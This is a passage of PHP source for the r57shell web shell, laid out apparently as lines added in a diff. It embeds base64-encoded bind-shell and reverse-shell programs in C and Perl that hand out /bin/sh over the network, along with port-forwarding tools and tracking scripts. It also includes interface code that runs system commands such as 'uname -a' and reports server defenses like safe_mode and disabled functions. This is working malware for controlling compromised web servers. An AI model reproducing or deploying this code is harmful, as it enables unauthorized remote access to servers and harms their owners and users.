@file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; } +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if 